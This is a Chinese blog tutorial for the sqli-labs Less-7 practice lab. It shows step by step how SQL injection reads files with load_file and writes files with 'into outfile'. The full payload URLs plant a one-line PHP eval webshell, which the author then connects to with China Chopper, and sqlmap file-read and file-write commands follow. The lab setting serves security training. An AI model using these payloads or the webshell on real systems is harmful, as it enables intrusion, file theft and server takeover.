利用SQL注入进行文件读写(详细步骤的实现+图)【靶场:sqli-labs/Less-7】

最新推荐文章于 2024-01-05 09:09:18 发布
最新推荐文章于 2024-01-05 09:09:18 发布
阅读量3.3k 收藏 7
点赞数
分类专栏: sqli-labs靶场 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46709219/article/details/111188998
版权

原理啊,成因啊就不再啰嗦了,直接上实现过程。

一)环境:

攻击机:192.168.67.140
目标主机:192.168.67.143

二)实际操作:

利用mysql的读写文件函数进行文件的读取:

在目标主机的(win7-2)E盘下新建一个flag.txt文件,可以通过输入 select load_file("E:\\flag.txt"); 命令读取指定路径下的flag.txt文件的内容:
在这里插入图片描述
在这里插入图片描述
在实际中通过漏洞利用进行文件读取:

在攻击机(win7-1)中访问存在SQL注入的网站(如目标主机win7-2中的sqli-labs)中构造url:

http://192.168.67.143/sqli/Less-1/?id=-1' union select 1,load_file("F:\\flag.txt"),3 --+   #一定要知道文件的绝对路径

在这里插入图片描述
2)MySQL注入写文件(要先知道目标主机相关绝对路径)

如果是实际的环境就会有一台攻击机(hacker机器)【192.168.67.140】,一台目标主机(目标用户的机器)【192.168.67.143】,然后攻击者在攻击机中访问 http://192.168.67.143/sqli/Less-7/?id=1')) order by 3 --+ ,接着在攻击机中访问 http://192.168.67.143/sqli/Less-7/?id=1')) union select 1,'<?php phpinfo();?>',3 into outfile 'C:\\phpstudy\\PHPTutorial\\WWW\\sqli\\Less-7\\1.php' --+ 此时就会在目标主机中写入一个攻击者想要写入的1.php文件,如果这个写入的文件是攻击者准备好的木马文件那么,目标主机就被写入了一个木马文件,那么攻击者就可以利用中国菜刀进行连接到目标主机获得其所有目录。

接着在存在SQL注入的网站(如sqli-labs)中构造url:

http://192.168.67.143/sqli/Less-7/?id=1')) order by 3 --+   说明有3个字段位置

在这里插入图片描述
在这里插入图片描述

192.168.67.143/sqli/Less-7/?id=-1')) union select 1,'<?php phpinfo();?>',3 into outfile 'E:\\phpStudy\\WWW\\sqli\\Less-7\\1.php' --+

此时就将 phpinfo() 的内容写入到目标主机192.168.67.143 的 E:\phpStudy\WWW\sqli\Less-7 路径下并创建一个1.php文件

效果图:
原本 E:\phpStudy\WWW\sqli\Less-7 路径下没有1.php文件:
在这里插入图片描述

利用SQL注入写文件之后 E:\phpstudy\PHPTutorial\WWW\sqli\Less-7 路径下自动生成1.php文件:
在这里插入图片描述
此时可以使用攻击机浏览器访问192.168.67.143/sqli/Less-7/1.php:
在这里插入图片描述
3)写入webshell(一句话木马,并使用菜刀进行连接)
在攻击机中构造url:

192.168.67.143/sqli/Less-7/?id=-1')) union select 1,'<?php @eval($_POST["x"]);?>',3 into outfile 'E:\\phpStudy\\WWW\\sqli\\Less-7\\2.php' --+

在这里插入图片描述
此时就将一句话木马写入到目标主机192.168.67.143 的 E:\phpStudy\WWW\sqli\Less-7 路径下并创建一个2.php文件
在这里插入图片描述
接着利用中国菜刀连接:
在这里插入图片描述
此时就可以在攻击机中查看目标主机的完整目录。

4)sqlmap安全测试

python sqlmap.py -hh  #查看详细的帮助信息
读文件:--file-read "要读取的文件所在绝对路径"
       python sqlmap.py -u "http://192.168.67.140/sqli/Less-7/?id=1" --file-read "E://flag1.txt"   
写文件(将本地文件上载到数据库服务器的文件系统):--file-write="要保存到服务器的本地文件(必须是在本地也就是攻击机中已经存在的文件)" --file-dest "本地也就是攻击机中已经存在的文件要在目标网站中保存的地址"
       python sqlmap.py -u "http://192.168.67.140/sqli/Less-7/?id=1" --file-write="E://flag.txt" --file-dest "E://"

在这里插入图片描述
在这里插入图片描述

python sqlmap.py -u "http://192.168.67.140/sqli/Less-7/?id=1" --file-read "E://flag1.txt" --batch

在这里插入图片描述

结果:
在这里插入图片描述
在这里插入图片描述

python sqlmap.py -u "http://192.168.67.140/sqli/Less-7/?id=1" --file-write "E://flag.txt" --file-dest "E://target.txt" --batch

在这里插入图片描述

A&&K
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
SQL注入-文件读写文件取+写入:函数、使用方法
05-30 8433
SQL注入文件读写
SQL注入文件
weixin_43765321的博客
03-02 3616
1. 文件的基本条件和使用 1.1 SQL注入文件读写 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。 1.2 文件读写的基本条件 当前用户权限对该文件文件在该服务器上。 路径完整。 文件大小小于max_sllowed_packet。 当前数据库用户有FILE权限,File_priv为yes secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作。 在MySQL5.5.53中,File_priv默认
渗透测试-SQL注入-文件读写及木马植入
fjc0214的博客
12-08 467
因为我们不知道可写文件夹和可写路径,所以这个漏洞能利用的可能性很小。这是在我们自己搭建的环境中测试这个漏洞,我们先确定文件写权限,然后再进行文件读写。真实环境中,我们需要爆破出可写的文件路径。
【网络安全---sql注入(2)】如何通过SQL注入getshell?如何通过SQL注入文件或者数据库数据?一篇文章告诉你过程和原理。
m0_67844671的博客
10-01 1741
sql注入】如何通过SQL注入getshell?如何通过SQL注入文件或者数据库数据?一篇文章告诉你过程和原理。本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件文件。通过SQL输入来注入木马来getshell等,讲解了比较详细的过程;
5-sql注入文件读写
最新发布
m0_62978778的博客
01-05 627
高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限。一般可以与union中做为一个字段使用,查看config.php(即mysql的密码),apache配置…就是利用文件写权限进行注入,它可以写入一句话木马,也可以取系统文件的敏感信息。outfile 后面不能接0x开头或者char转换以后的路径,只能是单引号路径。后面的路径可以是单引号,0x,char转换的字符。报错显示,遗留文件,漏洞报错,平台配置文件等。代表只能对该路径下文件进行写。
sql注入文件写入
一只菜鸟的博客
10-31 1789
sql注入中写入webshell的几种方式 secure_file_priv="c:/…"被注释掉或者是web路径 php.ini中的get_magic_quotes_gpc()函数未开启 其中secure_file_priv有三种情况 在进行写入websell时,要注意参数secure_file_priv是否有指定路径或者是否为null。最好要获得root权限 空,表示导入导出没有任何限制 有指定路径,比如("c:/xxx/xxx"):只能向指定路径导入导出文件 nul
Sqli-labs 堆叠注入篇 (Less38~53)
angry_program的博客
02-15 1261
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 堆叠注入篇对应labs的38~53关: Less-38 字符型堆叠注入 虽然用很常规的方法都可以注入成功,但是并不侧重于注入爆数据; 而是考察堆叠注入: http://localhost:2333/Less-38/index.php ?id=0' union select 1...
网络安全之Sql注入sqlmap
weixin_44277013的博客
08-07 1602
SQL注入漏洞从1998年圣诞节大火以来,长盛不衰,虽然开发人员想出各种方法对它进行围追堵截,却始终不能赶尽杀绝,sql注入的根本原因就是将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行。
(手工)【sqli-labs7】GET请求、文件读写注入:使用方法
05-30 729
sqli-labs7】文件读写注入
SQL注入文件读写
永远是少年
06-27 2169
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
利用SQLmap实现 SQL 注入
LAL07019的博客
06-28 1340
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。
通过sql注入漏洞文件获取webshell
qq_43757105的博客
10-16 4142
一、前提条件: 当前用户具有文件读写权限 知道文件的绝对路径 Mysql.ini设置secure_file_priv为下所示 二、手工方式 文件: 写文件: 首先发现注入点,可以利用注入手法进行回显 利用into outfile ‘上传文件路径+文件名’ 进行文件操作,如下所示: http://192.168.132.139/sqli-labs-master/Less-1/?id=2' and 1=2 union s...
【网安神器篇】——Sqlmap详解
热门推荐
Demo不是emo的博客
01-13 1万+
sqlmap源码阅
sqli-labs/Less-7
07-28
sqli-labs是一个用于学习和练习SQL注入漏洞的实验室环境。Less-7是其中的一个挑战,它主要涉及基于错误消息的盲注漏洞。 在Less-7中,你将面对一个包含漏洞的应用程序,该应用程序在处理用户输入时存在SQL注入漏洞。具体来说,这个挑战是通过一个GET请求向应用程序发送参数来触发的。 你可以通过利用应用程序对错误消息的显示方式来获取关于数据库的信息,从而获取敏感信息。通过构造恶意的输入,你可以利用这个漏洞来执行任意的SQL查询。 请注意,在实际环境中,SQL注入漏洞是一种非常危险的安全漏洞,攻击者可以利用它来获取敏感信息、修改数据库内容甚至完全控制应用程序。因此,在学习和练习过程中,请确保只在合法授权的环境中进行,并且遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值